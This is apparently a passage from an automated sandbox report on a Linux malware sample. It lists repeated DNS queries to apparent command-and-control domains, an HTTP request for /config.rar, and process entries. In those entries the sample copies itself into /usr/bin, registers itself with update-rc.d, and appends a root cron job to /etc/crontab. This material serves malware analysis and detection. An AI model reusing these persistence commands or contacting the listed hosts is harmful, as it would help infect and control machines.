Aug 20, 2024 15:33:33.527622938 CEST	8.8.8.8	192.168.2.23	0x2ccb	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:33.539046049 CEST	8.8.4.4	192.168.2.23	0x4a07	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:33.555068970 CEST	8.8.8.8	192.168.2.23	0xae84	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:33.565102100 CEST	8.8.4.4	192.168.2.23	0x51e8	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:33.572416067 CEST	8.8.8.8	192.168.2.23	0x18b0	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:38.586992979 CEST	8.8.8.8	192.168.2.23	0x4328	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:38.603593111 CEST	8.8.4.4	192.168.2.23	0x13da	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:38.625411987 CEST	8.8.8.8	192.168.2.23	0xeaf3	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:38.636445045 CEST	8.8.4.4	192.168.2.23	0xe116	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:38.656827927 CEST	8.8.8.8	192.168.2.23	0xb982	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:43.670757055 CEST	8.8.8.8	192.168.2.23	0xe27c	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:43.685909986 CEST	8.8.4.4	192.168.2.23	0x343c	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:43.695863962 CEST	8.8.8.8	192.168.2.23	0xa012	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:43.706366062 CEST	8.8.4.4	192.168.2.23	0xb55a	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:43.719875097 CEST	8.8.8.8	192.168.2.23	0x9476	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:48.736217022 CEST	8.8.8.8	192.168.2.23	0x2208	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:48.746845007 CEST	8.8.4.4	192.168.2.23	0x7c67	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:48.757909060 CEST	8.8.8.8	192.168.2.23	0x3b04	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:48.767620087 CEST	8.8.4.4	192.168.2.23	0xa6e6	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:48.785546064 CEST	8.8.8.8	192.168.2.23	0xe776	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:53.823205948 CEST	8.8.8.8	192.168.2.23	0xcbd7	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:53.834819078 CEST	8.8.4.4	192.168.2.23	0xf523	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:53.844042063 CEST	8.8.8.8	192.168.2.23	0xbf3	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:53.860893011 CEST	8.8.4.4	192.168.2.23	0x72cd	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:53.868809938 CEST	8.8.8.8	192.168.2.23	0xb17f	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:58.883702040 CEST	8.8.8.8	192.168.2.23	0x4072	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:58.894099951 CEST	8.8.4.4	192.168.2.23	0xb849	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:58.903830051 CEST	8.8.8.8	192.168.2.23	0xfc2f	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:58.919605970 CEST	8.8.4.4	192.168.2.23	0xd75a	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:58.928422928 CEST	8.8.8.8	192.168.2.23	0xc570	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:03.945302010 CEST	8.8.8.8	192.168.2.23	0x13ff	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:03.956146955 CEST	8.8.4.4	192.168.2.23	0x4994	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:03.969789028 CEST	8.8.8.8	192.168.2.23	0x176f	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:03.979603052 CEST	8.8.4.4	192.168.2.23	0xc4b1	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:03.987632036 CEST	8.8.8.8	192.168.2.23	0x5419	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:09.000402927 CEST	8.8.8.8	192.168.2.23	0x5d47	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:09.018481970 CEST	8.8.4.4	192.168.2.23	0x8012	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:09.033356905 CEST	8.8.8.8	192.168.2.23	0x4166	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:09.044285059 CEST	8.8.4.4	192.168.2.23	0xda42	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:09.051935911 CEST	8.8.8.8	192.168.2.23	0x5f3	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:14.066730976 CEST	8.8.8.8	192.168.2.23	0xf2df	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:14.077651978 CEST	8.8.4.4	192.168.2.23	0xa12f	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:14.111656904 CEST	8.8.8.8	192.168.2.23	0xa857	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:14.133721113 CEST	8.8.4.4	192.168.2.23	0xa061	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:14.140583992 CEST	8.8.8.8	192.168.2.23	0x5ae7	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:19.154084921 CEST	8.8.8.8	192.168.2.23	0x61ad	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:19.164902925 CEST	8.8.4.4	192.168.2.23	0xfefb	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:19.177695036 CEST	8.8.8.8	192.168.2.23	0xc0a	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:19.194538116 CEST	8.8.4.4	192.168.2.23	0x28ab	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:19.218457937 CEST	8.8.8.8	192.168.2.23	0x6d51	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:24.233237028 CEST	8.8.8.8	192.168.2.23	0xae18	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:24.243072033 CEST	8.8.4.4	192.168.2.23	0x5df2	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:24.254429102 CEST	8.8.8.8	192.168.2.23	0x1205	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:24.267159939 CEST	8.8.4.4	192.168.2.23	0x8e44	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:24.274929047 CEST	8.8.8.8	192.168.2.23	0x8c52	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:29.291583061 CEST	8.8.8.8	192.168.2.23	0x334e	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:29.314192057 CEST	8.8.4.4	192.168.2.23	0x196a	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:29.323683023 CEST	8.8.8.8	192.168.2.23	0x1bc0	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:29.339569092 CEST	8.8.4.4	192.168.2.23	0x7b7d	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:29.347484112 CEST	8.8.8.8	192.168.2.23	0x2510	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:34.375806093 CEST	8.8.8.8	192.168.2.23	0xfd36	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:34.391058922 CEST	8.8.4.4	192.168.2.23	0xd216	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:34.401767969 CEST	8.8.8.8	192.168.2.23	0x1485	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:34.413877010 CEST	8.8.4.4	192.168.2.23	0x7244	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:34.420672894 CEST	8.8.8.8	192.168.2.23	0x5f9b	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:39.445445061 CEST	8.8.8.8	192.168.2.23	0xf563	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:39.455568075 CEST	8.8.4.4	192.168.2.23	0x8573	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:39.493314028 CEST	8.8.8.8	192.168.2.23	0xbdf2	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:39.511337042 CEST	8.8.4.4	192.168.2.23	0x6565	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:39.518507957 CEST	8.8.8.8	192.168.2.23	0x3b21	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:44.555475950 CEST	8.8.8.8	192.168.2.23	0xccfc	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:44.569109917 CEST	8.8.4.4	192.168.2.23	0x35b6	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:44.582562923 CEST	8.8.8.8	192.168.2.23	0xa23f	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:44.593102932 CEST	8.8.4.4	192.168.2.23	0x4920	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:44.609062910 CEST	8.8.8.8	192.168.2.23	0x7652	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:49.625333071 CEST	8.8.8.8	192.168.2.23	0xf492	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:49.635902882 CEST	8.8.4.4	192.168.2.23	0xffa9	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:49.659149885 CEST	8.8.8.8	192.168.2.23	0xea5b	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:49.670355082 CEST	8.8.4.4	192.168.2.23	0x6d5e	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:49.679826975 CEST	8.8.8.8	192.168.2.23	0xfb51	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:54.701713085 CEST	8.8.8.8	192.168.2.23	0x6d2	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:54.711842060 CEST	8.8.4.4	192.168.2.23	0xc211	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:54.722115993 CEST	8.8.8.8	192.168.2.23	0x640b	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:54.732453108 CEST	8.8.4.4	192.168.2.23	0xf36f	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:54.739579916 CEST	8.8.8.8	192.168.2.23	0xbd37	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:59.760524035 CEST	8.8.8.8	192.168.2.23	0xbf8a	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:59.771076918 CEST	8.8.4.4	192.168.2.23	0x661f	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:59.795047998 CEST	8.8.8.8	192.168.2.23	0x7f5b	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:59.813102961 CEST	8.8.4.4	192.168.2.23	0xb91f	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:59.819709063 CEST	8.8.8.8	192.168.2.23	0xba95	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:04.840450048 CEST	8.8.8.8	192.168.2.23	0xd664	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:04.850723982 CEST	8.8.4.4	192.168.2.23	0x3d47	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:04.865865946 CEST	8.8.8.8	192.168.2.23	0xd92b	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:04.877391100 CEST	8.8.4.4	192.168.2.23	0x5fa4	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:04.885186911 CEST	8.8.8.8	192.168.2.23	0xe19e	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:10.913506031 CEST	8.8.8.8	192.168.2.23	0xc41f	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:10.926918030 CEST	8.8.4.4	192.168.2.23	0x7882	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:10.937247992 CEST	8.8.8.8	192.168.2.23	0x657f	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:10.947144985 CEST	8.8.4.4	192.168.2.23	0xe634	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:10.954763889 CEST	8.8.8.8	192.168.2.23	0xd447	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:15.969352961 CEST	8.8.8.8	192.168.2.23	0x7458	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:15.978885889 CEST	8.8.4.4	192.168.2.23	0x3090	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:15.989343882 CEST	8.8.8.8	192.168.2.23	0x6471	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:16.000397921 CEST	8.8.4.4	192.168.2.23	0xee01	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:16.008491993 CEST	8.8.8.8	192.168.2.23	0x768	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

aaa.dsaj2a.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	35282	23.253.46.64	80

Timestamp	Bytes transferred	Direction	Data
Aug 20, 2024 15:33:13.228722095 CEST	229	OUT	GET /config.rar HTTP/1.1 Accept: / Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322) Host: aaa.dsaj2a.org Connection: Keep-Alive
Aug 20, 2024 15:33:13.718792915 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Tue, 20 Aug 2024 13:33:08 GMT Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Aug 20, 2024 15:33:13.718806028 CEST	193	IN	Data Raw: 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 Data Ascii: ound.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>

System Behavior

Analysis Process: dash PID: 6202, Parent PID: 4331

General

Start time (UTC):	13:33:06
Start date (UTC):	20/08/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	13:33:06
Start date (UTC):	20/08/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.bf7OUfIiir /tmp/tmp.YpFzGJMNgu /tmp/tmp.lS9NOxlH0t
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	13:33:06
Start date (UTC):	20/08/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	13:33:06
Start date (UTC):	20/08/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.bf7OUfIiir /tmp/tmp.YpFzGJMNgu /tmp/tmp.lS9NOxlH0t
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	13:33:11
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	/tmp/HaJTqGiPpD
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:11
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:11
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:11
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:11
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:11
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:11
Start date (UTC):	20/08/2024
Path:	/sbin/update-rc.d
Arguments:	update-rc.d HaJTqGiPpD defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Start time (UTC):	13:33:12
Start date (UTC):	20/08/2024
Path:	/sbin/update-rc.d
Arguments:	-
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Start time (UTC):	13:33:12
Start date (UTC):	20/08/2024
Path:	/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	13:33:11
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:11
Start date (UTC):	20/08/2024
Path:	/bin/sh
Arguments:	sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	13:33:11
Start date (UTC):	20/08/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	13:33:11
Start date (UTC):	20/08/2024
Path:	/bin/sed
Arguments:	sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/usr/bin/kigdktzeum
Arguments:	/usr/bin/kigdktzeum who 6230
File size:	625878 bytes
MD5 hash:	487aaa06ee19b8dfaa6a6b2eef2535e4

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/usr/bin/kigdktzeum
Arguments:	-
File size:	625878 bytes
MD5 hash:	487aaa06ee19b8dfaa6a6b2eef2535e4

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/usr/bin/kigdktzeum
Arguments:	/usr/bin/kigdktzeum sh 6230
File size:	625878 bytes
MD5 hash:	487aaa06ee19b8dfaa6a6b2eef2535e4

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/usr/bin/kigdktzeum
Arguments:	-
File size:	625878 bytes
MD5 hash:	487aaa06ee19b8dfaa6a6b2eef2535e4

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/usr/bin/kigdktzeum
Arguments:	/usr/bin/kigdktzeum "ls -la" 6230
File size:	625878 bytes
MD5 hash:	487aaa06ee19b8dfaa6a6b2eef2535e4

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/usr/bin/kigdktzeum
Arguments:	-
File size:	625878 bytes
MD5 hash:	487aaa06ee19b8dfaa6a6b2eef2535e4

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/usr/bin/kigdktzeum
Arguments:	/usr/bin/kigdktzeum uptime 6230
File size:	625878 bytes
MD5 hash:	487aaa06ee19b8dfaa6a6b2eef2535e4

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/usr/bin/kigdktzeum
Arguments:	-
File size:	625878 bytes
MD5 hash:	487aaa06ee19b8dfaa6a6b2eef2535e4

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
